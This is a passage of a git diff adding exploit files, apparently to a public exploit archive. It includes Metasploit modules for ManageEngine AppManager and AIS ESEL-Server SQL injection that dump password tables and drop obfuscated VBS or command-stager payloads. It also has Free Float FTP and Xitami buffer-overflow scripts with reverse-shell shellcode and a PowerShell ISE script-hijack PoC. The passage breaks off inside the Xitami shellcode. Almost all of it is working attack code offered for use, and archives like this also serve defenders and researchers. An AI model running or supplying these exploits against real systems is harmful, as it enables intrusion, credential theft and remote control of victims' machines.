+        [
+          ['URL', 'https://pentest.com.tr/exploits/ManageEngine-App-Manager-14-SQLi-Remote-Code-Execution.html']
+        ],
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 500,
+          'PAYLOAD' => 'windows/shell_reverse_tcp',
+          'RPORT' => 8443,
+          'SSL' => true
+        },
+      'Payload' =>
+        {
+          'Encoder' => 'x86/shikata_ga_nai'
+        },
+      'Platform'       => ['win'],
+      'Arch'           => [ARCH_X86, ARCH_X64],
+      'Targets'        =>
+        [
+           ['AppManager 14', {}],
+           ['AppManager 13', {}],
+           ['AppManager 12', {}],
+           ['AppManager 11', {}]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Apr 17 2019',
+      'DefaultTarget'  => 1))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI of the application', '/'])
+      ]
+    )
+  end
+##
+# Check exploit vulnerability basically // 'Appears' more convenient
+##
+  def check
+    res = inject(Rex::Text.rand_text_alpha(1))
+
+    if res.code = "200" && res.headers['set-cookie'] =~ /JSESSIONID/
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+##
+# VBS payload and Post Data preparation
+##
+  def get_payload
+
+    handler
+    payload = generate_payload_exe
+    @vbs_content = Msf::Util::EXE.to_exe_vbs(payload)
+    ## determining the target directory
+    if target.name == 'AppManager 14'
+      tfile = "AppManager14"
+    elsif target.name == 'AppManager 13'
+      tfile = "AppManager13"
+    elsif target.name == 'AppManager 12'
+      tfile = "AppManager12"
+    elsif target.name == 'AppManager 11'
+      tfile = "AppManager11"
+    end
+
+    fhashes = Rex::Text.rand_text_alpha_lower(8) + ".txt"
+    ## parameters required to read the user table
+    hashes = "sid=1;copy+(select+username,password+from+AM_UserPasswordTable)+to+$$"
+    hashes << "c:\\Program+Files+(x86)\\ManageEngine\\"
+    hashes << "#{tfile}"
+    hashes << "\\working\\"
+    hashes << "#{fhashes}"
+    hashes << "$$;--"
+
+    res = inject("#{hashes}")
+
+    if res.code = "200" && res.headers['set-cookie'] =~ /JSESSIONID/
+      print_good("Users in the database were taken...")
+      res = send_request_cgi({
+        'method'   => 'GET',
+        'uri'      => normalize_uri(target_uri.path, "#{fhashes}") # users file url
+      })
+
+      if res.code == "404"
+       fail_with(Failure::Unreachable, 'The database could not be read!')
+      else
+       print_status("--------------------Usernames and Passwords---------------------")
+       puts res.body # users table output
+       print_status("----------------------------------------------------------------") 
+      end 
+    else
+      fail_with(Failure::Unreachable, 'Connection error occurred!')
+    end
+
+    ## fetch base64 part in vbs payload
+    pb64 = @vbs_content.split('"
+	Dim')[0].split(' = "')[2]
+    ## vbs file in one line
+    vbs_file = 'On Error Resume Next:Set objWbemLocator = CreateObject("WbemScripting.SWbemLocator"):'
+    vbs_file << 'if Err.Number Then:WScript.Echo vbCrLf & "Error # " & " " & Err.Description:End If:O'
+    vbs_file << 'n Error GoTo 0:On Error Resume Next:Select Case WScript.Arguments.Count:Case 2:strCo'
+    vbs_file << 'mputer = Wscript.Arguments(0):strQuery = Wscript.Arguments(1):Set wbemServices = obj'
+    vbs_file << 'WbemLocator.ConnectServer (strComputer,"Root\\CIMV2"):Case 4:strComputer = Wscript.A'
+    vbs_file << 'rguments(0):strUsername = Wscript.Arguments(1):strPassword = Wscript.Arguments(2):st'
+    vbs_file << 'rQuery = Wscript.Arguments(3):Set wbemServices = objWbemLocator.ConnectServer (strCo'
+    vbs_file << 'mputer,"Root\\CIMV2",strUsername,strPassword):case 6:strComputer = Wscript.Arguments'
+    vbs_file << '(0):strUsername = Wscript.Arguments(1):strPassword = Wscript.Arguments(2):strQuery ='
+    vbs_file << ' Wscript.Arguments(4):namespace = Wscript.Arguments(5):Set wbemServices = objWbemLoca'
+    vbs_file << 'tor.ConnectServer (strComputer,namespace,strUsername,strPassword):Case Else:strMsg ='
+    vbs_file << ' "Error # in parameters passed":WScript.Echo strMsg:WScript.Quit(0):End Select:Set w'
+    vbs_file << 'bemServices = objWbemLocator.ConnectServer (strComputer, namespace, strUsername, str'
+    vbs_file << 'Password):if Err.Number Then:WScript.Echo vbCrLf & "Error # "  & " " & Err.Descriptio'
+    vbs_file << 'n:End If:On Error GoTo 0:On Error Resume Next:Set colItems = wbemServices.ExecQuery(s'
+    vbs_file << 'trQuery):if Err.Number Then:WScript.Echo vbCrLf & "Error # "  & " " & Err.Description'
+    vbs_file << ':End If:On Error GoTo 0:i=0:For Each objItem in colItems:if i=0 then:header = "":For '
+    vbs_file << 'Each param in objItem.Properties_:header = header & param.Name & vbTab:Next:WScript.E'
+    vbs_file << 'cho header:i=1:end if:serviceData = "":For Each param in objItem.Properties_:serviceD'
+    vbs_file << 'ata = serviceData & param.Value & vbTab:Next:WScript.Echo serviceData:Next:Function b'
+    vbs_file << 'PBdVfYpfCEHF(hBPVZMitxq):HHgwqsqii = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-m'
+    vbs_file << 'icrosoft-com:datatypes" & Chr(34) & " " & "dt:dt=" & Chr(34) & "bin.base64" & Chr(34)'
+    vbs_file << ' & ">" & hBPVZMitxq & "</B64DECODE>":Set TInPBSeVlL = CreateObject("MSXML2.DOMDocument'
+    vbs_file << '.3.0"):TInPBSeVlL.LoadXML(HHgwqsqii):bPBdVfYpfCEHF = TInPBSeVlL.selectsinglenode("B64D'
+    vbs_file << 'ECODE").nodeTypedValue:set TInPBSeVlL = nothing:End Function:Function txhYXYJJl():Emkf'
+    vbs_file << 'dMDdusgGha = "'
+    vbs_file << "#{pb64}"
+    vbs_file << '":Dim CCEUdwNSS:Set CCEUdwNSS = CreateObject("Scripting.FileSystemObject"):Dim zhgqIZn'
+    vbs_file << 'K:Dim gnnTqZvAcL:Set zhgqIZnK = CCEUdwNSS.GetSpecialFolder(2):gnnTqZvAcL = zhgqIZnK & '
+    vbs_file << '"\" & CCEUdwNSS.GetTempName():CCEUdwNSS.CreateFolder(gnnTqZvAcL):yZUoLXnPic = gnnTqZvAc'
+    vbs_file << 'L & "\" & "SAEeVSXQVkDEIG.exe":Dim mEciydMZTsoBmAo:Set mEciydMZTsoBmAo = CreateObject("'
+    vbs_file << 'Wscript.Shell"):LXbjZKnEQUfaS = bPBdVfYpfCEHF(EmkfdMDdusgGha):Set TUCiiidRgJQdxTl = Cre'
+    vbs_file << 'ateObject("ADODB.Stream"):TUCiiidRgJQdxTl.Type = 1:TUCiiidRgJQdxTl.Open:TUCiiidRgJQdxT'
+    vbs_file << 'l.Write LXbjZKnEQUfaS:TUCiiidRgJQdxTl.SaveToFile yZUoLXnPic, 2:mEciydMZTsoBmAo.run yZU'
+    vbs_file << 'oLXnPic, 0, true:CCEUdwNSS.DeleteFile(yZUoLXnPic):CCEUdwNSS.DeleteFolder(gnnTqZvAcL):E'
+    vbs_file << 'nd Function:txhYXYJJl:WScript.Quit(0)'
+    ## encode the vbs file to base64 and then encode the url-hex
+    encoding_vbs = Rex::Text.uri_encode(Rex::Text.encode_base64(vbs_file), 'hex-all')
+
+    ## post preparation // creating and writing files on the server with SQLi
+    vbs_payload = "sid=1;copy+(select+convert_from(decode($$#{encoding_vbs}$$,$$base64$$)"
+    vbs_payload << ",$$utf-8$$))+to+$$C:\\\\Program+Files+(x86)\\\\ManageEngine\\\\"
+    vbs_payload << "#{tfile}"
+    vbs_payload << "\\\\working\\\\conf\\\\application\\\\scripts\\\\wmiget.vbs$$;"
+
+    res = inject("#{vbs_payload}")
+
+    if res.code = "200" && res.headers['set-cookie'] =~ /JSESSIONID/
+      print_good("The harmful .vbs file was successfully written to the server.")
+      print_status("Keep in mind! You may have to wait between 10-300 seconds for the shell session.")
+    else
+      fail_with(Failure::Unreachable, 'Connection error occurred!')
+    end
+
+    return payload
+  end
+##
+# Call functions
+##
+  def exploit
+    unless Exploit::CheckCode::Appears == check
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+    end
+    print_status("Payload is preparing...")
+    get_payload
+
+  end
+##
+# Inj payload
+##
+  def inject(payload)
+
+    res = send_request_cgi(
+      {
+      'method' => 'POST',
+      'ctype'  => 'application/x-www-form-urlencoded',
+      'uri' => normalize_uri(target_uri.path, '/jsp/Popup_SLA.jsp'),
+      'data' => payload
+      }, 25)
+    
+  end
+end
+##
+# The end of the adventure (o_O) // AkkuS
+##
\ No newline at end of file
diff --git a/exploits/windows/remote/46762.py b/exploits/windows/remote/46762.py
new file mode 100755
index 000000000..4b961c404
--- /dev/null
+++ b/exploits/windows/remote/46762.py
@@ -0,0 +1,71 @@
+# Exploit Title: Free Float FTP 1.0 "SIZE" Remote Buffer Overflow
+# Google Dork: N/A
+# Date: 4/26/2019
+# Exploit Author: Kevin Randall
+# Vendor Homepage:
+# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
+# Version: Firmware: Free Float FTP 1.0
+# Tested on: Windows XP Professional Service Pack 2
+# CVE : N/A
+
+#Generate Shellcode with MSFVenom
+#msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP.OF.LOCAL.MACHINE LPORT=4444 -b '\x00\x0A\x0D' -f python
+#Setup listener "use exploit/multi/handler" "set payload windows/meterpreter/reverse_tcp" "set LHOST IP.OF.LOCAL.MACHINE" "set LPORT 4444" "exploit"
+
+#!/usr/bin/python
+
+import socket
+import sys
+
+buf = ""
+buf += "\xba\x99\x2c\xb1\x7d\xdb\xd1\xd9\x74\x24\xf4\x5d\x2b"
+buf += "\xc9\xb1\x56\x31\x55\x13\x83\xed\xfc\x03\x55\x96\xce"
+buf += "\x44\x81\x40\x8c\xa7\x7a\x90\xf1\x2e\x9f\xa1\x31\x54"
+buf += "\xeb\x91\x81\x1e\xb9\x1d\x69\x72\x2a\x96\x1f\x5b\x5d"
+buf += "\x1f\x95\xbd\x50\xa0\x86\xfe\xf3\x22\xd5\xd2\xd3\x1b"
+buf += "\x16\x27\x15\x5c\x4b\xca\x47\x35\x07\x79\x78\x32\x5d"
+buf += "\x42\xf3\x08\x73\xc2\xe0\xd8\x72\xe3\xb6\x53\x2d\x23"
+buf += "\x38\xb0\x45\x6a\x22\xd5\x60\x24\xd9\x2d\x1e\xb7\x0b"
+buf += "\x7c\xdf\x14\x72\xb1\x12\x64\xb2\x75\xcd\x13\xca\x86"
+buf += "\x70\x24\x09\xf5\xae\xa1\x8a\x5d\x24\x11\x77\x5c\xe9"
+buf += "\xc4\xfc\x52\x46\x82\x5b\x76\x59\x47\xd0\x82\xd2\x66"
+buf += "\x37\x03\xa0\x4c\x93\x48\x72\xec\x82\x34\xd5\x11\xd4"
+buf += "\x97\x8a\xb7\x9e\x35\xde\xc5\xfc\x51\x13\xe4\xfe\xa1"
+buf += "\x3b\x7f\x8c\x93\xe4\x2b\x1a\x9f\x6d\xf2\xdd\x96\x7a"
+buf += "\x05\x31\x10\xea\xfb\xb2\x60\x22\x38\xe6\x30\x5c\xe9"
+buf += "\x87\xdb\x9c\x16\x52\x71\x97\x80\x9d\x2d\xa7\x52\x76"
+buf += "\x2f\xa8\x43\xda\xa6\x4e\x33\xb2\xe8\xde\xf4\x62\x48"
+buf += "\x8f\x9c\x68\x47\xf0\xbd\x92\x82\x99\x54\x7d\x7a\xf1"
+buf += "\xc0\xe4\x27\x89\x71\xe8\xf2\xf7\xb2\x62\xf6\x08\x7c"
+buf += "\x83\x73\x1b\x69\xf4\x7b\xe3\x6a\x91\x7b\x89\x6e\x33"
+buf += "\x2c\x25\x6d\x62\x1a\xea\x8e\x41\x19\xed\x71\x14\x2b"
+buf += "\x85\x44\x82\x13\xf1\xa8\x42\x93\x01\xff\x08\x93\x69"
+buf += "\xa7\x68\xc0\x8c\xa8\xa4\x75\x1d\x3d\x47\x2f\xf1\x96"
+buf += "\x2f\xcd\x2c\xd0\xef\x2e\x1b\x62\xf7\xd0\xd9\x4d\x50"
+buf += "\xb8\x21\xce\x60\x38\x48\xce\x30\x50\x87\xe1\xbf\x90"
+buf += "\x68\x28\xe8\xb8\xe3\xbd\x5a\x59\xf3\x97\x3b\xc7\xf4"
+buf += "\x14\xe0\xf8\x8f\x55\x17\xf9\x6f\x7c\x7c\xfa\x6f\x80"
+buf += "\x82\xc7\xb9\xb9\xf0\x06\x7a\xfe\x0b\x3d\xdf\x57\x86"
+buf += "\x3d\x73\xa7\x83"
+
+
+shellcode = '\x90'*20 + buf
+payload = "A"*247+"\xF6\xC1\xB3\x7C"+ shellcode +"C"*(749-len(shellcode))
+
+s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+##Add FTP Server IP Here###############
+connect = s.connect(('192.168.0.9',21))
+#######################################
+s.recv(1024)
+s.send('USER anonymous\r\n')
+
+s.recv(1024)
+s.send('PASS anonymous\r\n')
+
+s.recv(1024)
+s.send('SIZE' + payload + '\r\n')
+
+s.recv(1024)
+s.send('QUIT\r\n')
+
+s.close()
\ No newline at end of file
diff --git a/exploits/windows/remote/46763.py b/exploits/windows/remote/46763.py
new file mode 100755
index 000000000..7f5b206da
--- /dev/null
+++ b/exploits/windows/remote/46763.py
@@ -0,0 +1,72 @@
+# Exploit Title: Free Float FTP 1.0 "STOR" Remote Buffer Overflow
+# Google Dork: N/A
+# Date: 4/26/2019
+# Exploit Author: Kevin Randall
+# Vendor Homepage:
+# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
+# Version: Firmware: Free Float FTP 1.0
+# Tested on: Windows XP Professional Service Pack 2
+# CVE : N/A
+
+#Generate Shellcode with MSFVenom
+#msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP.OF.LOCAL.MACHINE LPORT=4444 -b '\x00\x0A\x0D' -f python
+#Setup listener "use exploit/multi/handler" "set payload windows/meterpreter/reverse_tcp" "set LHOST IP.OF.LOCAL.MACHINE" "set LPORT 4444" "exploit"
+
+#!/usr/bin/python
+
+import socket
+import sys
+
+buf =  ""
+buf += "\xba\x99\x2c\xb1\x7d\xdb\xd1\xd9\x74\x24\xf4\x5d\x2b"
+buf += "\xc9\xb1\x56\x31\x55\x13\x83\xed\xfc\x03\x55\x96\xce"
+buf += "\x44\x81\x40\x8c\xa7\x7a\x90\xf1\x2e\x9f\xa1\x31\x54"
+buf += "\xeb\x91\x81\x1e\xb9\x1d\x69\x72\x2a\x96\x1f\x5b\x5d"
+buf += "\x1f\x95\xbd\x50\xa0\x86\xfe\xf3\x22\xd5\xd2\xd3\x1b"
+buf += "\x16\x27\x15\x5c\x4b\xca\x47\x35\x07\x79\x78\x32\x5d"
+buf += "\x42\xf3\x08\x73\xc2\xe0\xd8\x72\xe3\xb6\x53\x2d\x23"
+buf += "\x38\xb0\x45\x6a\x22\xd5\x60\x24\xd9\x2d\x1e\xb7\x0b"
+buf += "\x7c\xdf\x14\x72\xb1\x12\x64\xb2\x75\xcd\x13\xca\x86"
+buf += "\x70\x24\x09\xf5\xae\xa1\x8a\x5d\x24\x11\x77\x5c\xe9"
+buf += "\xc4\xfc\x52\x46\x82\x5b\x76\x59\x47\xd0\x82\xd2\x66"
+buf += "\x37\x03\xa0\x4c\x93\x48\x72\xec\x82\x34\xd5\x11\xd4"
+buf += "\x97\x8a\xb7\x9e\x35\xde\xc5\xfc\x51\x13\xe4\xfe\xa1"
+buf += "\x3b\x7f\x8c\x93\xe4\x2b\x1a\x9f\x6d\xf2\xdd\x96\x7a"
+buf += "\x05\x31\x10\xea\xfb\xb2\x60\x22\x38\xe6\x30\x5c\xe9"
+buf += "\x87\xdb\x9c\x16\x52\x71\x97\x80\x9d\x2d\xa7\x52\x76"
+buf += "\x2f\xa8\x43\xda\xa6\x4e\x33\xb2\xe8\xde\xf4\x62\x48"
+buf += "\x8f\x9c\x68\x47\xf0\xbd\x92\x82\x99\x54\x7d\x7a\xf1"
+buf += "\xc0\xe4\x27\x89\x71\xe8\xf2\xf7\xb2\x62\xf6\x08\x7c"
+buf += "\x83\x73\x1b\x69\xf4\x7b\xe3\x6a\x91\x7b\x89\x6e\x33"
+buf += "\x2c\x25\x6d\x62\x1a\xea\x8e\x41\x19\xed\x71\x14\x2b"
+buf += "\x85\x44\x82\x13\xf1\xa8\x42\x93\x01\xff\x08\x93\x69"
+buf += "\xa7\x68\xc0\x8c\xa8\xa4\x75\x1d\x3d\x47\x2f\xf1\x96"
+buf += "\x2f\xcd\x2c\xd0\xef\x2e\x1b\x62\xf7\xd0\xd9\x4d\x50"
+buf += "\xb8\x21\xce\x60\x38\x48\xce\x30\x50\x87\xe1\xbf\x90"
+buf += "\x68\x28\xe8\xb8\xe3\xbd\x5a\x59\xf3\x97\x3b\xc7\xf4"
+buf += "\x14\xe0\xf8\x8f\x55\x17\xf9\x6f\x7c\x7c\xfa\x6f\x80"
+buf += "\x82\xc7\xb9\xb9\xf0\x06\x7a\xfe\x0b\x3d\xdf\x57\x86"
+buf += "\x3d\x73\xa7\x83"
+
+
+shellcode = '\x90'*20 + buf
+payload = "A"*247+"\xF6\xC1\xB3\x7C"+ shellcode +"C"*(749-len(shellcode))
+
+s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+##Add FTP Server IP Here###############
+connect = s.connect(('192.168.0.9',21))
+#######################################
+
+s.recv(1024)
+s.send('USER anonymous\r\n')
+
+s.recv(1024)
+s.send('PASS anonymous\r\n')
+
+s.recv(1024)
+s.send('STOR' + payload + '\r\n')
+
+s.recv(1024)
+s.send('QUIT\r\n')
+
+s.close()
\ No newline at end of file
diff --git a/exploits/windows/remote/46782.rb b/exploits/windows/remote/46782.rb
new file mode 100755
index 000000000..70c5fdeac
--- /dev/null
+++ b/exploits/windows/remote/46782.rb
@@ -0,0 +1,135 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::MSSQL_COMMANDS
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'AIS logistics ESEL-Server Unauth SQL Injection RCE',
+      'Description'    => %q{
+        This module will execute an arbitrary payload on an "ESEL" server used by the
+        AIS logistic software. The server typically listens on port 5099 without TLS.
+        There could also be server listening on 5100 with TLS but the port 5099 is
+        usually always open.
+        The login process is vulnerable to an SQL Injection. Usually a MSSQL Server
+        with the 'sa' user is in place.
+
+        This module was verified on version 67 but it should also run on lower versions.
+        An fixed version was created by AIS in September 2017. However most systems
+        have not been updated.
+
+        In regard to the payload, unless there is a closed port in the web server,
+        you dont want to use any "bind" payload. You want a "reverse" payload,
+        probably to your port 80 or to any other outbound port allowed on the firewall.
+
+        Currently, one delivery method is supported
+
+        This method takes advantage of the Command Stager subsystem. This allows using
+        various techniques, such as using a TFTP server, to send the executable. By default
+        the Command Stager uses 'wcsript.exe' to generate the executable on the target.
+
+        NOTE: This module will leave a payload executable on the target system when the
+        attack is finished.
+
+      },
+      'Author'         =>
+        [
+          'Manuel Feifel'
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', '2019-10123'],
+        ],
+      'Platform'       => 'win',
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Payload'        =>
+        {
+          'BadChars'  => "\x00\xff\x27",
+        },
+      'Targets'        =>
+        [
+          [ 'Automatic', { } ],
+        ],
+      'CmdStagerFlavor' => 'vbs',
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => '2019-03-27',
+      'DefaultOptions' =>
+        {
+          'RPORT' => 5099
+        },
+      ))
+  end
+
+  # This is method required for the CmdStager to work...
+  def execute_command(cmd, _opts)
+    cmd_xp = "EXEC master..xp_cmdshell '#{cmd}'"
+    send_login_msg(create_login_msg_sql(cmd_xp))
+  end
+
+  # prepends the required length to the message and sends it to the server
+  def send_login_msg(login_msg, check_response = true)
+    length = login_msg.length
+    length += length.to_s.length
+    login_msg = "#{length}#{login_msg}"
+
+    connect
+
+    sock.put(login_msg)
+    response = sock.recv(10000)
+
+    if check_response
+      if (response.include? 'Zugangsdaten Falsch') && (response.length > (length - 20))
+        print_good('Correct response received => Data send successfully')
+      else
+        print_warning('Wrong response received => Probably data could not be sent successfully')
+      end
+    end
+
+    return response
+  ensure
+    # Every time a new Connection is required
+    disconnect
+  end
+
+  # embeds a sql command into the login message
+  def create_login_msg_sql(sql_cmd)
+    return create_login_msg("#{rand(1_000..9_999)}'; #{sql_cmd}--")
+  end
+
+  # create a plain login message
+  def create_login_msg(pw)
+    delim = "\xFF"
+    login_str = "#{delim}000000#{delim}20180810213226#{delim}01#{delim}60"\
+                "#{delim}02#{delim}1111#{delim}#{pw}#{delim}AAAAA#{delim}120"
+
+  end
+
+  def check
+    int = rand(1..1_000)
+    response_bypass = send_login_msg(create_login_msg("#{rand(1_000..9_999)}' OR #{int}=#{int}--"), false)
+    if response_bypass.include? 'Zugangsdaten OK'
+      CheckCode::Vulnerable
+    else
+      print_status("Response was: #{response_bypass}")
+      CheckCode::Safe
+    end
+  end
+
+  def exploit
+    # enable xp cmdshell, used to execute commands later
+    # Software uses the 'sa' user by default
+    send_login_msg(create_login_msg_sql(mssql_xpcmdshell_enable))
+    # The porotocol has no limites on max-data
+    execute_cmdstager({ :linemax => 1500 })
+    print_warning('The payload is left on the client in the \%TEMP\% Folder of the corresponding user.')
+    print_status('Stager should now be executed.')
+  end
+end
\ No newline at end of file
diff --git a/exploits/windows/remote/46790.txt b/exploits/windows/remote/46790.txt
new file mode 100644
index 000000000..84f4ef228
--- /dev/null
+++ b/exploits/windows/remote/46790.txt
@@ -0,0 +1,155 @@
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/WINDOWS-POWERSHELL-ISE-FILENAME-PARSING-FLAW-RCE-0DAY.txt 
+[+] ISR: ApparitionSec          
+[+] Zero Day Initiative Program
+
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Windows PowerShell ISE
+
+The Windows PowerShell Integrated Scripting Environment (ISE) is a host application for Windows PowerShell.
+In the ISE, you can run commands and write, test, and debug scripts in a single Windows-based graphic user interface.
+
+
+[Vulnerability Type]
+Filename Parsing Flaw Remote Code Execution 0day
+
+
+[References]
+ZDI-CAN-8005
+
+
+[Security Issue]
+Windows PowerShell ISE will execute wrongly supplied code when debugging specially crafted PowerShell scripts that contain
+array brackets as part of the filename. This can result in ISE executing attacker supplied scripts pointed to by the filename
+and not the "trusted" PS file currently loaded and being viewed by a user in the host application. This undermines the integrity of
+PowerShell ISE allowing potential unexpected remote code execution.
+
+In PowerShell brackets are used to access array elements.
+
+PS C:\> $a=1..10
+PS C:\> $a[4]
+5
+
+However, when brackets are used as part of the filename it can be used to hijack the currently loaded file in place of another malicious file.
+That file must contain a single matching char value which is also found in our specially crafted filename.
+
+Requirements are both files must reside in the same directory. Example, if a file named [HelloWorldTutoria1].ps1 resides alongside a
+file named 1.ps1 it will create a script hijacking condition. Note, the last letter is a number "1" not a lowercase "L".
+
+Other things I discovered playing with PS filenames is we can target scripts using a single alphabetic or numeric char and certain symbols.
+PowerShell scripts with only a single quote also work, [Pwned'].ps1 will load and execute ===> '.ps1 if debugged from the vuln ISE application.
+
+These chars also get the job done:
+"$" "_" "#" "^"  plus any single case insensitive letter a-z or numbers 0-9, [Hello_World].ps1 ====> _.ps1
+
+[Hello].ps1 will execute this instead =====> h.ps1
+
+Dashes "-" throw the following error: "The specified wildcard character pattern is not valid: [Hello-World].ps1" when pointing to
+another PS file named -.ps1 and seems to treat it sort of like a meta-character.
+
+[pw3d].ps1 <===== expected to execute
+
+3.ps1 <===== actually executed
+
+This exploits the trust between PowerShell ISE and the end user. So scripts debugged local or over a network share display "trusted" code
+in ISE that is expected to run. However, when the user debugs the script a different script gets executed.
+Interestingly, that second script does NOT get loaded into PowerShell ISE upon execution, so a user may not see anything amiss.
+
+User interaction is required for a successful attack to occur and obviously running any unknown PowerShell script can be dangerous. 
+Again, this exploit takes advantage of "trust" where users can see and read the code and will trust it as everything looks just fine and
+yet ... still they get PWNED!.
+
+Tested successfully on Win7/10
+
+Long live user interaction! lol...
+
+
+[POC Video URL]
+https://www.youtube.com/watch?v=T2I_-iUPaFw
+
+
+[Exploit/POC]
+After opening PS files in ISE, set the execution policy so can test without issues.
+set-executionpolicy unrestricted -force
+
+PS scripts over Network shares may get 'RemoteSigned' security policy issue so run below cmd.
+
+set-executionpolicy unrestricted -force process
+Choose 'R' to run once.
+
+Below Python script will create two .ps1 files to demonstrate the vulnerable condition.
+Examine the code, what does it say? it reads... Write-output "Hello World!"... now Run it...
+
+BAM! other PS script executes!.
+
+
+#PowerShell ISE 0day Xploit
+#ZDI-CAN-8005
+#ZDI CVSS: 7.0
+#hyp3rlinx
+#ApparitionSec
+
+
+fname1="[HelloWorldTutoria1].ps1"    #Expected code to run is 'HelloWorld!'
+fname2="1.ps1"                       #Actual code executed is calc.exe for Poc
+evil_code="start calc.exe"           #Edit to suit your needs.
+c=0
+payload1='Write-Output "Hello World!"'
+payload2=evil_code+"\n"+'Write-Output "Hello World!"'
+
+def mk_ps_hijack_script():
+    global c
+    c+=1
+    f=open(globals()["fname"+str(c)],"wb")
+    f.write(globals()["payload"+str(c)])
+    f.close()
+    if c<2:
+        mk_ps_hijack_script()
+        
+
+if __name__=="__main__":
+    mk_ps_hijack_script()
+    print "PowerShell ISE Xploit 0day Files Created!"
+    print "Discovery by hyp3rlinx"
+    print "ZDI-CAN-8005"
+
+
+
+[Network Access]
+Remote
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+ZDI Case opened : 2019-02-06
+Case officially contracted to ZDI : 2019-02-20
+
+Vendor Disclosure : 2019-03-01
+submitted to the vendor as ZDI-CAN-8005.
+
+April 25, 2019 : MSRC response (as per ZDI): "we've determined that this doesn't meet the bar for servicing via a security update.
+we have opened a bug with the PowerShell team, and this is something they may address in a future release as a form of defense-in-depth."
+
+ZDI also indicated they too will close the case.
+May 1, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/windows/remote/46797.py b/exploits/windows/remote/46797.py
new file mode 100755
index 000000000..05ba4e2b0
--- /dev/null
+++ b/exploits/windows/remote/46797.py
@@ -0,0 +1,125 @@
+# Exploit Title: Xitami Web Server 2.5 Remote Buffer Overflow (SEH + Egghunter)
+# Date: May 4, 2019
+# Author: ElSoufiane
+# Version: 2.5b4
+# Tested on: Windows Vista Ultimate (Build 6000) and Windows XP SP3 Professional
+# Discovered by: Krystian Kloskowski
+#
+# Set up a multi handler listener in MSFConsole
+# then run exploit
+#
+# root@f6c9fa91b403:~/XitamiWebServer# python exploit.py 192.168.1.149
+# [+] Sending exploit payload...
+#
+# Check the MSFConsole listener
+#
+# msf5 exploit(multi/handler) > run
+# [*] Started reverse TCP handler on 0.0.0.0:5801
+# [*] Encoded stage with x86/shikata_ga_nai
+# [*] Sending encoded stage (267 bytes) to 172.17.0.1
+# [*] Command shell session 6 opened (172.17.0.2:5801 -> 172.17.0.1:39416) at 2019-05-04 00:17:55 +0000
+
+
+
+# C:\Xitami>
+
+import socket
+import sys
+import struct
+
+if len(sys.argv) != 2 :
+	print "[+] Usage : python exploit.py [VICTIM_IP]"
+	exit(0)
+
+TCP_IP = sys.argv[1]
+TCP_PORT = 80
+
+
+egg = "SOUFSOUF"
+nops = "\x90"*10
+
+#msfvenom -p windows/shell/reverse_tcp LPORT=5801 LHOST=192.168.1.129 -f python -v shellcode -e x86/alpha_mixed
+shellcode = "\x89\xe0\xd9\xe5\xd9\x70\xf4\x5b\x53\x59\x49\x49"
+shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
+shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
+shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
+shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+shellcode += "\x69\x6c\x68\x68\x6c\x42\x63\x30\x37\x70\x63\x30"
+shellcode += "\x51\x70\x6b\x39\x6d\x35\x70\x31\x6f\x30\x70\x64"
+shellcode += "\x4e\x6b\x76\x30\x70\x30\x4e\x6b\x76\x32\x54\x4c"
+shellcode += "\x6e\x6b\x72\x72\x46\x74\x6c\x4b\x53\x42\x55\x78"
+shellcode += "\x34\x4f\x4e\x57\x42\x6a\x35\x76\x30\x31\x59\x6f"
+shellcode += "\x4e\x4c\x77\x4c\x70\x61\x31\x6c\x75\x52\x34\x6c"
+shellcode += "\x35\x70\x6b\x71\x38\x4f\x56\x6d\x47\x71\x4a\x67"
+shellcode += "\x4a\x42\x49\x62\x63\x62\x63\x67\x6e\x6b\x63\x62"
+shellcode += "\x52\x30\x4c\x4b\x53\x7a\x77\x4c\x6e\x6b\x70\x4c"
+shellcode += "\x72\x31\x31\x68\x59\x73\x30\x48\x53\x31\x68\x51"
+shellcode += "\x72\x71\x4e\x6b\x30\x59\x57\x50\x55\x51\x6e\x33"
+shellcode += "\x4c\x4b\x73\x79\x72\x38\x48\x63\x56\x5a\x62\x69"
+shellcode += "\x4c\x4b\x66\x54\x6c\x4b\x73\x31\x49\x46\x64\x71"
+shellcode += "\x4b\x4f\x6c\x6c\x5a\x61\x68\x4f\x66\x6d\x77\x71"
